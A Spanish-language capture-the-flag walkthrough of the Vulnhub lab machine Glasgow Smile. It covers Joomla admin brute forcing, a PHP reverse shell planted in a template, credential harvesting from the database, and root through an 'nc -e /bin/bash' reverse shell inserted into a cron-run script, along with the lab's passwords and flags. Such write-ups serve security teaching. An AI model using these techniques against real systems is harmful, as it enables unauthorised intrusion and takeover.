[VLN] Glasgow Smile

Hoy vamos a hackear la maquina de Vulnhub llamada GlasgowSmile. Podeis descargarla desde el siguiente enlace: Glasgow Smile

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

sml@m0nique:~$ nmap -A -p- 192.168.112.138
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-17 20:44 CEST
Nmap scan report for 192.168.112.138
Host is up (0.00067s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 67:34:48:1f:25:0e:d7:b3:ea:bb:36:11:22:60:8f:a1 (RSA)
|   256 4c:8c:45:65:a4:84:e8:b1:50:77:77:a9:3a:96:06:31 (ECDSA)
|_  256 09:e9:94:23:60:97:f7:20:cc:ee:d6:c1:9b:da:18:8e (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.37 seconds
Exploramos mas en detalle el puerto 80.

sml@m0nique:~$ gobuster dir -u http://192.168.112.138 -w 
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.112.138
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,txt,php
[+] Timeout:        10s
===============================================================
2020/06/17 20:45:33 Starting gobuster
===============================================================
/index.html (Status: 200)
/joomla (Status: 301)
/how_to.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2020/06/17 20:47:09 Finished                                                                                                                                   
===============================================================    
Vemos que tiene el directorio /joomla Si visitamos http://192.168.112.138/joomla/index.php podemos ver la pagina web, que contiene dialogos de la pelicula etc... Hacemos un diccionario con el siguiente comando:

sml@m0nique:~$ cewl http://192.168.112.138/joomla/index.php > dicjoker.txt
Ahora arrancamos Burpsuite, visitamos http://192.168.112.138/joomla/administrator/index.php que es donde se encuentra el panel para administrar joomla, y probaremos cualquier usario para obtener la request. Una vez hecha la request, la mandamos en Burp Suite a "Intruder" y hacemos bruteforce. Como usuario, usaremos "joomla" y como diccionario, el que acabamos de crear (dicjoker.txt). Al poco rato obtenemos los credenciales! joomla/Gotham

Low Shell


Ahora que tenemos los credenciales, nos logueamos en http://192.168.112.138/joomla/administrator/index.php Preparamos una reverse shell.

sml@m0nique:~$ cp /usr/share/webshells/php/php-reverse-shell.php .
sml@m0nique:~$ mv php-reverse-shell.php rshell.php
sml@m0nique:~$ nano rshell.php # Editamos para poner nuestra ip/puerto.
Vamos a: Extension -> templates -> templates. En styles vemos que el default es protostar, asi que vamos a Templates -> Protostar -> index.php y pegamos ahi la reverse shell. Damos a "Save". Ponemos nc a escuchar.

sml@m0nique:~$ nc -nlvp 1234
listening on [any] 1234 ...
Y visitamos http://192.168.112.138/joomla/index.php

sml@m0nique:~$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.112.128] from (UNKNOWN) [192.168.112.138] 57540
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) 
x86_64 GNU/Linux                                                                
     
 17:57:31 up  4:14,  0 users,  load average: 0.00, 0.00, 0.01                                                                                                     
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT                 
uid=33(www-data) gid=33(www-data) groups=33(www-data)                              
/bin/sh: 0: can't access tty; job control turned off                             
$ python3 -c 'import pty; pty.spawn("/bin/bash");'
Ya estamos dentro como www-data :)

www-data@glasgowsmile:/$ cd /var/www/html/joomla
www-data@glasgowsmile:/var/www/html/joomla$ cat configuration.php
---SNIP---
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'joomla';
public $password = 'babyjoker';
public $db = 'joomla_db';
---SNIP---
Ahora que tenemos estas credenciales, echamos un vistazo a la BBDD.

www-data@glasgowsmile:/$ mysql -u joomla -p
mysql -u joomla -p
Enter password: babyjoker   
Welcome to the MariaDB monitor.  Commands end with ; or \g.                        
Your MariaDB connection id is 31253                                                
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10                               
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.             
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.  
MariaDB [(none)]> show databases;                                               
                                                                                
show databases;
+--------------------+
| Database           |
+--------------------+
| batjoke            |
| information_schema |
| joomla_db          |
| mysql              |
| performance_schema |
+--------------------+
5 rows in set (0.003 sec)

MariaDB [(none)]> use batjoke;
use batjoke;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [batjoke]> show tables;
show tables;
+-------------------+
| Tables_in_batjoke |
+-------------------+
| equipment         |
| taskforce         |
+-------------------+
2 rows in set (0.000 sec)

MariaDB [batjoke]> select * from taskforce;
select * from taskforce;
+----+---------+------------+---------+-----------------------------------------
-----+
| id | type    | date       | name    | pswd                                    
     |
+----+---------+------------+---------+-----------------------------------------
-----+
|  1 | Soldier | 2020-06-14 | Bane    | YmFuZWlzaGVyZQ==                        
     |
|  2 | Soldier | 2020-06-14 | Aaron   | YWFyb25pc2hlcmU=                        
     |
|  3 | Soldier | 2020-06-14 | Carnage | Y2FybmFnZWlzaGVyZQ==                    
     |
|  4 | Soldier | 2020-06-14 | buster  | YnVzdGVyaXNoZXJlZmY=                    
     |
|  6 | Soldier | 2020-06-14 | rob     | 
Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ |
|  7 | Soldier | 2020-06-14 | aunt    | YXVudGlzIHRoZSBmdWNrIGhlcmU=            
     |
+----+---------+------------+---------+-----------------------------------------
-----+
6 rows in set (0.000 sec)
Vemos que hay un "name" rob, igual que uno de los usuarios del sistema, asi que procedemos a ver si obtenemos su password haciendo un decode del string con base64.

sml@m0nique:~$ echo "Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/" | base64 -d
???AllIHaveAreNegativeThoughts???
Parece que tenemos el password :)

sml@m0nique:~$ ssh rob@192.168.112.138
rob@192.168.112.138's password: 
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) 
x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun 16 13:24:25 2020 from 192.168.10.172
rob@glasgowsmile:~$

user.txt



rob@glasgowsmile:~$ ls -la
total 52
drwxr-xr-x 3 rob  rob  4096 Jun 16 13:04 .
drwxr-xr-x 5 root root 4096 Jun 15 06:34 ..
-rw-r----- 1 rob  rob   454 Jun 14 03:20 Abnerineedyourhelp
-rw------- 1 rob  rob     7 Jun 17 13:43 .bash_history
-rw-r--r-- 1 rob  rob   220 Jun 13 12:51 .bash_logout
-rw-r--r-- 1 rob  rob  3526 Jun 13 12:51 .bashrc
-rw-r----- 1 rob  rob   313 Jun 14 03:23 howtoberoot
drwxr-xr-x 3 rob  rob  4096 Jun 13 16:27 .local
-rw------- 1 rob  rob    81 Jun 15 04:08 .mysql_history
-rw-r--r-- 1 rob  rob   807 Jun 13 12:51 .profile
-rw-r--r-- 1 rob  rob    66 Jun 15 04:14 .selected_editor
-rw-r----- 1 rob  rob    38 Jun 13 16:41 user.txt
-rw------- 1 rob  rob   429 Jun 16 13:04 .Xauthority
rob@glasgowsmile:~$ cat user.txt
JKR[f5bb11acbb957915e421d62e7253d27a]
Echamos un vistazo al fichero llamado Abnerineedyourhelp

rob@glasgowsmile:~$ cat Abnerineedyourhelp
Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd 
rxlozsgx enq ghr bnmchshnm. Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc. 
Xnt bzm ehmc zm dmsqx hm ghr intqmzk qdzcr, "Sgd vnqrs ozqs ne gzuhmf z ldmszk 
hkkmdrr hr odnokd dwodbs xnt sn adgzud zr he xnt cnm's."
Mnv H mddc xntq gdko Zamdq, trd sghr ozrrvnqc, xnt vhkk ehmc sgd qhfgs vzx sn 
rnkud sgd dmhflz. 
RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ==
Es un texto cifrado... tiene pinta de ser algo parecido a ROT13 asi que vamos a usar cyberchef para probar ROT13 y "modificaciones". Hacemos un "paste" del texto en Cyberchef y seleccionamos ROT13 con "amount" 1. Visitamos cyberchef y elegimos rot13 (amount1) El resultado es:

Hello Dear, Arthur suffers from severe mental illness but we see little 
sympathy for his condition. This relates to his feeling about being ignored. 
You can find an entry in his journal reads, "The worst part of having a mental 
illness is people expect you to behave as if you don't."
Now I need your help Abner, use this password, you will find the right way to 
solve the enigma. 
STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==
El ultimo string parece ser base64 asi que...

sml@m0nique:~$ echo 
"STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==" | 
base64 -d
I33hope99my0death000makes44more8cents00than0my0life0
Obtenemos lo que parece un password, vamos a loguearnos como abner.

sml@m0nique:~$ ssh abner@192.168.112.138
abner@192.168.112.138's password: 
Permission denied, please try again.
abner@192.168.112.138's password: 
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) 
x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun 16 13:20:04 2020 from 192.168.10.172
abner@glasgowsmile:~$ 

user2.txt



abner@glasgowsmile:~$ cat user2.txt
JKR{0286c47edc9bfdaf643f5976a8cfbd8d}
Buscamos ficheros con los que podamos jugar.

abner@glasgowsmile:/home/penguin$ find / -user abner 2>/dev/null
/home/abner
/home/abner/user2.txt
/home/abner/.bash_history
/home/abner/.bashrc
/home/abner/.Xauthority
/home/abner/info.txt
/home/abner/.bash_logout
/home/abner/.profile
/home/abner/.ssh
/home/abner/.ssh/known_hosts
/home/abner/.local
/home/abner/.local/share
/home/abner/.local/share/nano
/var/www/html/joker.jpg
/var/www/joomla2/administrator/manifests/files/.dear_penguins.zip
Vemos que hay un fichero .zip algo escondido... Lo copiamos en /tmp y lo descomprimimos usando la password que hemos utilizado para loguearnos como abner.

abner@glasgowsmile:~$ cp 
/var/www/joomla2/administrator/manifests/files/.dear_penguins.zip /tmp
abner@glasgowsmile:~$ cd /tmp
abner@glasgowsmile:/tmp$ unzip .dear_penguins.zip 
Archive:  .dear_penguins.zip
[.dear_penguins.zip] dear_penguins password: 
  inflating: dear_penguins
abner@glasgowsmile:/tmp$ cat dear_penguins 
My dear penguins, we stand on a great threshold! It's okay to be scared; many 
of you won't be coming back. Thanks to Batman, the time has come to punish all 
of God's children! First, second, third and fourth-born! Why be biased?! Male 
and female! Hell, the sexes are equal, with their erogenous zones BLOWN 
SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS 
BEGUN!!!!!
scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz
Usamos el ultimo string como "password" para loguearnos como penguin.

sml@m0nique:~$ ssh penguin@192.168.112.138
penguin@192.168.112.138's password: 
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) 
x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun 16 13:20:25 2020 from 192.168.10.172
penguin@glasgowsmile:~$
Exploramos un poco mas el sistema.

user3.txt



penguin@glasgowsmile:~$ ls -la
total 40
drwxr-xr-x 5 penguin penguin 4096 Jun 16 11:58 .
drwxr-xr-x 5 root    root    4096 Jun 15 06:34 ..
-rw------- 1 penguin penguin    7 Jun 17 13:43 .bash_history
-rw-r--r-- 1 penguin penguin  220 Jun 15 06:34 .bash_logout
-rw-r--r-- 1 penguin penguin 3526 Jun 15 06:34 .bashrc
drwxr-xr-x 3 penguin penguin 4096 Jun 15 12:01 .local
-rw-r--r-- 1 penguin penguin  807 Jun 15 06:34 .profile
drwxr--r-- 2 penguin penguin 4096 Jun 16 12:52 SomeoneWhoHidesBehindAMask
drwx------ 2 penguin penguin 4096 Jun 15 11:22 .ssh
-rw------- 1 penguin penguin   58 Jun 15 11:20 .Xauthority
penguin@glasgowsmile:~$ cd SomeoneWhoHidesBehindAMask/
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ ls -la
total 332
drwxr--r-- 2 penguin penguin   4096 Jun 16 12:52 .
drwxr-xr-x 5 penguin penguin   4096 Jun 16 11:58 ..
-rwSr----- 1 penguin penguin 315904 Jun 15 11:45 find
-rw-r----- 1 penguin root      1457 Jun 15 11:50 PeopleAreStartingToNotice.txt
-rwxr-xr-x 1 penguin root       612 Jun 16 12:50 .trash_old
-rw-r----- 1 penguin penguin     38 Jun 16 12:52 user3.txt
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat user3.txt 
JKR{284a3753ec11a592ee34098b8cb43d52}     
Miramos tambien el otro .txt a ver si nos da alguna pista.

penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat 
PeopleAreStartingToNotice.txt 
Hey Penguin,
I'm writing software, I can't make it work because of a permissions issue. It 
only runs with root permissions. When it's complete I'll copy it to this folder.

Joker
Sabiendo esto, vamos a usar pspy64 a ver si "alguien" hace algo....

penguin@glasgowsmile:/tmp$ wget http://192.168.112.128/pspy64
--2020-06-19 17:46:48--  http://192.168.112.128/pspy64
Connecting to 192.168.112.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64.1’

pspy64.1                 100%[==================================>]   2.94M  
--.-KB/s    in 0.03s   

2020-06-19 17:46:48 (112 MB/s) - ‘pspy64.1’ saved [3078592/3078592]

penguin@glasgowsmile:/tmp$ chmod +x pspy64
penguin@glasgowsmile:/tmp$./pspy64

---SNIP---
2020/06/19 17:07:01 CMD: UID=0    PID=786    | /bin/sh -c 
/home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
---SNIP---

Privilege Escalation


Vemos que root ejecuta el fichero /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old el cual podemos editar! Agregamos la siguiente linea para obtener una reverse shell como root:

nc -e /bin/bash 192.168.112.128 5555
El fichero quedaria asi.

penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat .trash_old 
#/bin/sh                                                                        
nc -e /bin/bash 192.168.112.128 5555
exit 0
Ponemos nc a la escucha.

sml@m0nique:~$ nc -nlvp 5555
listening on [any] 5555 ...
Y tras un rato...

connect to [192.168.112.128] from (UNKNOWN) [192.168.112.138] 41266
python3 -c 'import pty; pty.spawn("/bin/bash");'
root@glasgowsmile:~# id
id
uid=0(root) gid=0(root) groups=0(root)

root.txt



root@glasgowsmile:~# cd /root
cd /root
root@glasgowsmile:~# ls
ls
root.txt  whoami
root@glasgowsmile:~# cat root.txt

Congratulations!

You've got the Glasgow Smile!

JKR{68028b11a1b7d56c521a90fc18252995}


Credits by

mindsflee

End


Y con esto ya seriamos root de la maquina :)